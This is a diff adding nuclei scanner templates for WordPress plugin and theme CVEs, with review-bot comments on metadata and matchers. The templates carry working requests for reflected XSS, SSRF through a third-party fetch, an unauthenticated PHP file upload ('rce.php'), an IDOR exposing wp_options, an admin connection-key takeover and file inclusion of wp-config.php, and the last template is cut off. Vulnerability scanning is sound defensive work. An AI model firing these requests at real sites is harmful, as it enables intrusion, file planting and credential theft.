+ cwe-id: CWE-79
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2019-6715-4184.yaml b/poc/cve/CVE-2019-6715-4184.yaml
new file mode 100644
index 0000000000..16bbedcfc0
--- /dev/null
+++ b/poc/cve/CVE-2019-6715-4184.yaml
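Review bot: `name` gives the affected range as `<= 1.1.5` while `description` says the fix is in 1.1.9 (`before 1.1.9`), so the two fields disagree about which versions are affected; pick one source (the NVD entry in `reference` is the natural tiebreaker) and align both, e.g. `name: Wordpress Plugin Checklist < 1.1.9 - Reflected Cross-Site Scripting (XSS)` if the description is right. The path also carries a stray `?&fill=`, which works but reads like a leftover from a removed parameter.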
@@ -0,0 +1,30 @@
+id: CVE-2019-6715
+
+info:
+ name: CVE-2019-6715
+ author: randomrobbie
+ severity: high
+ description: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated Arbitrary File Read / SSRF
+ tags: cve,cve2019,wordpress,wp-plugin,ssrf
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2019-6715
+ reference:
+ - https://vinhjaxt.github.io/2019/03/cve-2019-6715
+ - http://packetstormsecurity.com/files/160674/WordPress-W3-Total-Cache-0.9.3-File-Read-Directory-Traversal.html
+
+requests:
+ - raw:
+ - |
+ PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ {"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}
+
+ matchers:
+ - type: word
+ words:
+ - "TmVzc3VzQ29kZUV4ZWNUZXN0"
+ part: body
\ No newline at end of file
diff --git a/poc/cve/CVE-2020-13700-4510.yaml b/poc/cve/CVE-2020-13700-4510.yaml
new file mode 100644
index 0000000000..42d1d0f6e1
--- /dev/null
+++ b/poc/cve/CVE-2020-13700-4510.yaml
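Review bot: The SSRF oracle depends on a third party: the target is made to fetch `https://rfi.nessus.org/rfi.txt` and the match is the base64 marker that file is expected to contain, so the check fails closed whenever that host is unreachable from the target or changes its content, and every scan sends the scanned site's outbound traffic to an unrelated vendor. nuclei's built-in `{{interactsh-url}}` with a matcher on `interactsh_protocol` verifies the outbound request without relying on external content and keeps the callback under the operator's control. `name` is just the CVE id while `description` holds the human-readable title, so listings and reports show the wrong field; swap them so `name` reads `W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated Arbitrary File Read / SSRF`, and add `cwe-id: CWE-918` to `classification`.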
@@ -0,0 +1,40 @@
+id: CVE-2020-13700
+
+info:
+ name: acf-to-rest-api wordpress plugin IDOR
+ author: pikpikcu
+ severity: high
+ reference: https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5
+ description: |
+ An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress.
+ It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a
+ wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values.
+ tags: cve,cve2020,wordpress,plugin
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2020-13700
+ cwe-id: CWE-639
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-json/acf/v3/options/a?id=active&field=plugins'
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - 'Content-Type: application/json'
+ part: header
+
+ - type: word
+ words:
+ - 'acf-to-rest-api\/class-acf-to-rest-api.php'
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2020-17362-4655.yaml b/poc/cve/CVE-2020-17362-4655.yaml
new file mode 100644
index 0000000000..09f0ba5b32
--- /dev/null
+++ b/poc/cve/CVE-2020-17362-4655.yaml
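Review bot: The header word `Content-Type: application/json` is matched case-sensitively, and header names arrive lower-cased over HTTP/2 (and from some proxies), so a vulnerable site served that way is reported clean. Matching on `application/json` alone, or setting `case-insensitive: true` on that matcher, avoids the false negative. The `condition: and` under the second matcher has only one word and can be dropped, and `tags` uses `plugin` where the rest of the commit uses `wp-plugin`.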
@@ -0,0 +1,34 @@
+id: CVE-2020-17362
+info:
+ name: Nova Lite < 1.3.9 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: search.php in the Nova Lite theme before 1.3.9 for WordPress allows Reflected XSS.
+ reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
+ tags: cve,cve2020,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2020-17362
+ cwe-id: CWE-79
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+ - type: word
+ words:
+ - "nova-lite"
+ part: body
+ - type: word
+ part: header
+ words:
+ - text/html
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2020-24186-4794.yaml b/poc/cve/CVE-2020-24186-4794.yaml
new file mode 100644
index 0000000000..db823bc245
--- /dev/null
+++ b/poc/cve/CVE-2020-24186-4794.yaml
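Review bot: Nova Lite is a theme (the description says `Nova Lite theme` and the fingerprint matcher looks for `nova-lite` in the body), but `tags` carries `wp-plugin`; `tags: cve,cve2020,wordpress,xss,wp-theme` keeps the template findable under the right filter and out of plugin-only scan profiles. The `nova-lite` body check is a good addition over the sibling XSS templates because it ties the match to the affected theme rather than to any WordPress site.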
@@ -0,0 +1,89 @@
+id: CVE-2020-24186
+
+info:
+ name: Unauthenticated File upload wpDiscuz WordPress plugin RCE
+ author: Ganofins
+ severity: critical
+ description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server.
+ reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
+ tags: cve,cve2020,wordpress,wp-plugin,rce
+
+requests:
+ - raw:
+ - |
+ GET /?p=1 HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ Connection: close
+
+ - |
+ POST /wp-admin/admin-ajax.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Length: 745
+ Accept: */*
+ X-Requested-With: XMLHttpRequest
+ sec-ch-ua-mobile: ?0
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
+ Origin: {{BaseURL}}
+ Sec-Fetch-Site: same-origin
+ Sec-Fetch-Mode: cors
+ Sec-Fetch-Dest: empty
+ Referer: {{BaseURL}}
+ Accept-Encoding: gzip, deflate
+ Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+ Connection: close
+
+ ------WebKitFormBoundary88AhjLimsDMHU1Ak
+ Content-Disposition: form-data; name="action"
+
+ wmuUploadFiles
+ ------WebKitFormBoundary88AhjLimsDMHU1Ak
+ Content-Disposition: form-data; name="wmu_nonce"
+
+ {{wmuSecurity}}
+ ------WebKitFormBoundary88AhjLimsDMHU1Ak
+ Content-Disposition: form-data; name="wmuAttachmentsData"
+
+ undefined
+ ------WebKitFormBoundary88AhjLimsDMHU1Ak
+ Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php"
+ Content-Type: image/png
+
+ {{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f39/f2o/f39/cD9/f39/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}
+
+ ------WebKitFormBoundary88AhjLimsDMHU1Ak
+ Content-Disposition: form-data; name="postId"
+
+ 1
+ ------WebKitFormBoundary88AhjLimsDMHU1Ak--
+
+ extractors:
+ - type: regex
+ part: body
+ internal: true
+ name: wmuSecurity
+ group: 1
+ regex:
+ - 'wmuSecurity":"([a-z0-9]+)'
+
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - '"url":"([a-z:\\/0-9-.]+)"'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - 'success":true'
+ - 'fullname'
+ - 'shortname'
+ - 'url'
+ condition: and
+ part: body
diff --git a/poc/cve/CVE-2020-29395-5006.yaml b/poc/cve/CVE-2020-29395-5006.yaml
new file mode 100644
index 0000000000..9512b43c67
--- /dev/null
+++ b/poc/cve/CVE-2020-29395-5006.yaml
@@ -0,0 +1,38 @@
+id: CVE-2020-29395
+
+info: 
+ name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The EventON plugin through 3.0.5 for WordPress allows addons/?q= XSS via the search field.
+ reference:
+ - https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-29395
+ - https://www.myeventon.com/news/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2020-29395
+ cwe-id: CWE-79
+ tags: cve,cve2020,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2020-9043(1).yaml b/poc/cve/CVE-2020-9043(1).yaml
new file mode 100644
index 0000000000..3a4e5cdd20
--- /dev/null
+++ b/poc/cve/CVE-2020-9043(1).yaml
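Review bot: The second request uploads a file named `rce.php` (`filename="rce.php"` in the multipart body) and the extractor reports its `url`, but nothing removes it afterwards, so every scan leaves an attacker-style artifact in the target's uploads directory and will trip file-integrity monitoring; the template should be tagged `intrusive` and `description` should say that an upload is left behind (or a follow-up request should delete it, if the plugin exposes a way to). `Content-Length: 745` is hard-coded in the raw request while the body contains `{{wmuSecurity}}`, whose length varies; if the engine does not recompute the header for raw requests (confirm against its raw-request handling), the request is malformed on most targets. The `info` block also lacks `classification` (`cvss-metrics`, `cvss-score`, `cve-id`, `cwe-id`), which nearly every other CVE template in this commit provides.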
@@ -0,0 +1,80 @@
+id: CVE-2020-9043
+
+info:
+ name: WordPress wpCentral <1.5.1 - Information Disclosure
+ author: scent2d
+ severity: high
+ description: |
+ WordPress wpCentral plugin before 1.5.1 is susceptible to information disclosure. An attacker can access the connection key for WordPress Admin account and thus potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
+ impact: |
+ An attacker can exploit this vulnerability to gain sensitive information from the wpCentral plugin.
+ remediation: |
+ Update the wpCentral plugin to version 1.5.1 or later to fix the information disclosure vulnerability.
+ reference:
+ - https://wpscan.com/vulnerability/10074
+ - https://www.wordfence.com/blog/2020/02/vulnerability-in-wpcentral-plugin-leads-to-privilege-escalation/
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9043
+ - https://wordpress.org/plugins/wp-central/#developers
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-9043
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2020-9043
+ cwe-id: CWE-200
+ epss-score: 0.04173
+ epss-percentile: 0.91333
+ cpe: cpe:2.3:a:wpcentral:wpcentral:*:*:*:*:*:wordpress:*:*
+ metadata:
+ verified: true
+ max-request: 4
+ vendor: wpcentral
+ product: wpcentral
+ framework: wordpress
+ tags: cve,cve2020,wordpress,wp-plugin,wpcentral,authenticated,wp,wpscan
+
+http:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+ - |
+ GET /wp-admin/index.php HTTP/1.1
+ Host: {{Hostname}}
+ - |
+ GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1
+ Host: {{Hostname}}
+ - |
+ GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1
+ Host: {{Hostname}}
+
+ host-redirects: true
+ max-redirects: 2
+ matchers:
+ - type: dsl
+ dsl:
+ - "contains(header_4, 'text/html')"
+ - "status_code_4 == 200"
+ - "contains(body_4, 'wpCentral Connection Key')"
+ - contains(body_4, "pagenow = \'dashboard\'")
+ condition: and
+
+ extractors:
+ - type: regex
+ name: authkey
+ group: 1
+ regex:
+ - 'style="word-wrap:break-word;">([a-z0-9]+)'
+ internal: true
+ part: body
+
+ - type: regex
+ name: nonce
+ group: 1
+ regex:
+ - '_wpnonce=([0-9a-z]+)'
+ internal: true
+ part: body
+# digest: 490a0046304402204bffb24bf04e56aff7c5c70589b7ecbf9c04db1c030e793573251a9f104c2e1d02207a1cb6691600aaceae61e38e6ec3a9e54d43209ae9a6a254ab763e9a2b031198:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/CVE-2021-24210-5640.yaml b/poc/cve/CVE-2021-24210-5640.yaml
new file mode 100644
index 0000000000..50b0897459
--- /dev/null
+++ b/poc/cve/CVE-2021-24210-5640.yaml
@@ -0,0 +1,29 @@
+id: CVE-2021-24210
+
+info:
+ name: PhastPress < 1.111 - Open Redirect
+ author: 0x_Akoko
+ description: |
+ There is an open redirect in the PhastPress WordPress plugin before 1.111 that allows an attacker to malform a request to a page
+ with the plugin and then redirect the victim to a malicious page. There is also a support comment from another user one year
+ ago (https://wordpress.org/support/topic/phast-php-used-for-remote-fetch/) that says that the php involved in the request only
+ go to whitelisted pages but it's possible to redirect the victim to any domain.
+ reference: https://wpscan.com/vulnerability/9b3c5412-8699-49e8-b60c-20d2085857fb
+ severity: medium
+ tags: wordpress,cve,cve2021,redirect
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-24210
+ cwe-id: CWE-601
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fexample.com"
+
+ matchers:
+ - type: regex
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ part: header
diff --git a/poc/cve/CVE-2021-24291-5683.yaml b/poc/cve/CVE-2021-24291-5683.yaml
new file mode 100644
index 0000000000..d5501bff21
--- /dev/null
+++ b/poc/cve/CVE-2021-24291-5683.yaml
@@ -0,0 +1,36 @@
+id: CVE-2021-24291
+
+info:
+ name: Photo Gallery < 1.5.69 - Multiple Reflected Cross-Site Scripting (XSS)
+ author: geeknik
+ description: The plugin was vulnerable to Reflected Cross-Site Scripting (XSS) issues via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action (available to both unauthenticated and authenticated users)
+ reference: https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a
+ severity: medium
+ tags: cve,cve2021,xss,wordpress,wp-plugin,photo
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-24291
+ cwe-id: CWE-79
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1"%20onmouseover=alert(document.domain)//'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: word
+ words:
+ - "onmouseover=alert(document.domain)//"
+ - "wp-content/uploads/photo-gallery"
+ condition: and
diff --git a/poc/cve/CVE-2021-24316-5691.yaml b/poc/cve/CVE-2021-24316-5691.yaml
new file mode 100644
index 0000000000..9d76374f71
--- /dev/null
+++ b/poc/cve/CVE-2021-24316-5691.yaml
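Review bot: The body word `onmouseover=alert(document.domain)//` does not include the `"` that breaks out of the attribute, so a patched version that HTML-encodes the quote still contains the matched substring and is reported vulnerable; the word should include the unescaped `"` that precedes `onmouseover`, so the match only fires when the break-out survives output encoding. The description lists `gallery_id`, `tag`, `album_id` and `theme_id` as the affected parameters but the request tests `shortcode_id`; if that parameter is also affected, add it to the description, otherwise the request should exercise one of the documented ones.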
@@ -0,0 +1,39 @@
+id: CVE-2021-24316
+
+info:
+ author: 0x_Akoko
+ description: Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS.
+ name: An Unauthenticated Reflected XSS & XFS Mediumish theme through 1.0.47 for WordPress
+ severity: medium
+ tags: cve,cve2021,mediumish,xss,wordpress
+ reference:
+ - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e
+ - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-24316
+ cwe-id: CWE-79
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E '
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - ""
+ - "Sorry, no posts matched your criteria."
+ part: body
+ condition: and
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
diff --git a/poc/cve/CVE-2021-24387-5724.yaml b/poc/cve/CVE-2021-24387-5724.yaml
new file mode 100644
index 0000000000..69a9632897
--- /dev/null
+++ b/poc/cve/CVE-2021-24387-5724.yaml
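Review bot: The path literal ends with a space inside the quotes (`...%3C/script%3E '`), which becomes part of the request target; depending on how the engine encodes it the server sees either a trailing `%20` in the `s` parameter or a malformed request line, neither of which is intended — remove the space. `name` and `description` are swapped: `name` is a full sentence and `description` is the title-style string, so reports show the wrong field; put `Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS` under `name`. The request injects `{{randstr}}` but no matcher looks for it, so the randomised marker never confirms the reflection it was added for.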
@@ -0,0 +1,42 @@
+id: CVE-2021-24387
+
+info:
+ name: Real Estate 7 WordPress Theme < 3.1.1 - Unauthenticated Reflected XSS
+ author: suman_kar
+ severity: medium
+ description: |
+ The WP Pro Real Estate 7 WordPress theme before 3.1.1 did not properly sanitise the ct_community parameter
+ in its search listing page before outputting it back in it, leading to a reflected Cross-Site Scripting which
+ can be triggered in both unauthenticated or authenticated user context
+ reference:
+ - https://cxsecurity.com/issue/WLB-2021070041
+ - https://wpscan.com/vulnerability/27264f30-71d5-4d2b-8f36-4009a2be6745
+ - https://contempothemes.com/wp-real-estate-7/changelog/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-24387
+ cwe-id: CWE-79
+ tags: cve,cve2021,xss,wordpress
+
+requests:
+ - raw:
+ - |
+ GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+ Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+ Connection: close
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ''
+ - '/wp-content/themes/realestate'
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2021-24406-5736.yaml b/poc/cve/CVE-2021-24406-5736.yaml
new file mode 100644
index 0000000000..e9962f0eb1
--- /dev/null
+++ b/poc/cve/CVE-2021-24406-5736.yaml
@@ -0,0 +1,30 @@
+id: CVE-2021-24406
+
+info:
+ name: WordPress wpForo Forum < 1.9.7 - Open Redirect
+ author: 0x_Akoko
+ severity: medium
+ description: WordPress wpForo Forum < 1.9.7 is susceptible to an open redirect vulnerability because the plugin did not validate the redirect_to parameter in the login form of the forum, leading to an open redirect
+ issue after a successful login.
+ reference:
+ - https://wpscan.com/vulnerability/a9284931-555b-4c96-86a3-09e1040b0388
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24406
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-24406
+ cwe-id: CWE-601
+ tags: wordpress,redirect,cve,cve2021
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/community/?foro=signin&redirect_to=https://interact.sh/"
+
+ matchers:
+ - type: regex
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
+ part: header
+
+# Enhanced by mp on 2022/04/13
diff --git a/poc/cve/CVE-2021-24488(1).yaml b/poc/cve/CVE-2021-24488(1).yaml
new file mode 100644
index 0000000000..227a6f412a
--- /dev/null
+++ b/poc/cve/CVE-2021-24488(1).yaml
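Review bot: The redirect target is the literal third-party host `https://interact.sh/` and the regex matches `interact\.sh`, so the result depends on a hard-coded external domain rather than on a value the operator controls; the sibling redirect templates in this commit (CVE-2021-24210, CVE-2021-25028) use `example.com`, and `{{interactsh-url}}` is available when a live callback is wanted. Aligning on one of those keeps the open-redirect checks consistent and avoids pointing a scanned site's users at an unrelated domain if the redirect is ever followed. The `description` also continues onto a second line (`issue after a successful login.`) whose indentation is lost in this view; confirm in the stored file that it parses as part of the same scalar rather than as a stray key.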
@@ -0,0 +1,45 @@
+id: CVE-2021-24488
+
+info:
+ name: WordPress Plugin Post Grid < 2.1.8 - XSS
+ author: cckuailong
+ severity: medium
+ description: The slider import search feature and tab parameter of the Post Grid WordPress plugin before 2.1.8 settings are not properly sanitised before being output back in the pages, leading to Reflected Cross-Site Scripting issues
+ reference:
+ - https://wpscan.com/vulnerability/1fc0aace-ba85-4939-9007-d150960add4a
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24488
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-24488
+ cwe-id: CWE-79
+ tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(document.domain)// HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'value="\"onmouseover=alert(document.domain)/">'
+ - 'Post Grid'
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2021-24997-5782.yaml b/poc/cve/CVE-2021-24997-5782.yaml
new file mode 100644
index 0000000000..8f90e6b2d1
--- /dev/null
+++ b/poc/cve/CVE-2021-24997-5782.yaml
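Review bot: The second raw request puts an unencoded `"` in the request target (`&keyword="onmouseover=...`), which is not a valid URI character; servers and WAFs that enforce RFC 3986 on the request line answer 400 before WordPress sees it, so the check can fail closed on hardened hosts — encode it as `%22`. The body word `value="\"onmouseover=alert(document.domain)/">` expects a literal backslash and a single trailing slash while the request sends `//`; if that is what WordPress's request slashing produces it is fine, but a comment explaining the expected transformation would stop the next reader from treating it as a typo.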
@@ -0,0 +1,37 @@
+id: CVE-2021-24997
+
+info:
+ name: Wordpress Guppy <=1.1 - User ID Disclosure
+ author: Evan Rubinstein
+ severity: medium
+ description: Instances of the Guppy Wordpress extension up to 1.1 are vulnerable to an API disclosure vulnerability which allows remote unauthenticated attackrs to obtain all user IDs, and then use that information to make API requests to either get messages sent between users, or send messages posing as one user to another.
+ reference:
+ - https://www.exploit-db.com/exploits/50540
+ - https://patchstack.com/database/vulnerability/wp-guppy/wordpress-wp-guppy-plugin-1-2-sensitive-information-disclosure-vulnerability
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24997
+ - https://wpscan.com/vulnerability/747e6c7e-a167-4d82-b6e6-9e8613f0e900
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2021-24997
+ cwe-id: CWE-862
+ tags: wordpress,guppy,api,cve2021,cve,wp-plugin,edb,wpscan
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search="
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: body
+ words:
+ - '"guppyUsers":'
+ - '"userId":'
+ - '"type":'
+ condition: and
diff --git a/poc/cve/CVE-2021-25028-5787.yaml b/poc/cve/CVE-2021-25028-5787.yaml
new file mode 100644
index 0000000000..f056174b62
--- /dev/null
+++ b/poc/cve/CVE-2021-25028-5787.yaml
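Review bot: `description` has a typo (`attackrs` should be `attackers`) and `author` contains a space (`Evan Rubinstein`) where the rest of the commit uses handle-style values; neither affects matching but both surface in generated reports. The three body words plus status 200 are a reasonably specific fingerprint for this endpoint's JSON, and an empty user list would lack `"userId":` and correctly fail the `and` condition.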
@@ -0,0 +1,28 @@
+id: CVE-2021-25028
+
+info:
+ name: Event Tickets < 5.2.2 - Open Redirect
+ author: 0x_Akoko
+ severity: medium
+ description: The plugin does not validate the tribe_tickets_redirect_to parameter before redirecting the user to the given value, leading to an arbitrary redirect issue
+ reference:
+ - https://wpscan.com/vulnerability/80b0682e-2c3b-441b-9628-6462368e5fc7
+ - https://www.cvedetails.com/cve/CVE-2021-25028
+ tags: cve,cve2021,redirect,wordpress
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-25028
+ cwe-id: CWE-601
+
+requests:
+ - method: GET
+
+ path:
+ - '{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com'
+
+ matchers:
+ - type: regex
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
+ part: header
diff --git a/poc/cve/CVE-2021-39312-6327.yaml b/poc/cve/CVE-2021-39312-6327.yaml
new file mode 100644
index 0000000000..f9d8540c5f
--- /dev/null
+++ b/poc/cve/CVE-2021-39312-6327.yaml
@@ -0,0 +1,52 @@
+id: CVE-2021-39312
+
+info:
+  name: WordPress True Ranker <2.2.4 - Local File Inclusion
+  author: DhiyaneshDK
+  severity: high
+  description: WordPress True Ranker before version 2.2.4 allows sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file via local file inclusion.
+  remediation: Fixed in version 2.2.4
+  reference:
+    - https://wpscan.com/vulnerability/d48e723c-e3d1-411e-ab8e-629fe1606c79
+    - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39312
+    - https://plugins.trac.wordpress.org/browser/seo-local-rank/tags/2.2.2/admin/vendor/datatables/examples/resources/examples.php
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-39312
+    - https://github.com/ARPSyndicate/cvemon
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-39312
+    cwe-id: CWE-22
+    epss-score: 0.16864
+    epss-percentile: 0.95927
+    cpe: cpe:2.3:a:trueranker:true_ranker:*:*:*:*:*:wordpress:*:*
+  metadata:
+    max-request: 1
+    vendor: trueranker
+    product: true_ranker
+    framework: wordpress
+  tags: cve,cve2021,unauth,lfr,wpscan,wp-plugin,lfi,wp,wordpress,trueranker
+
+http:
+  - raw:
+      - |
+        POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
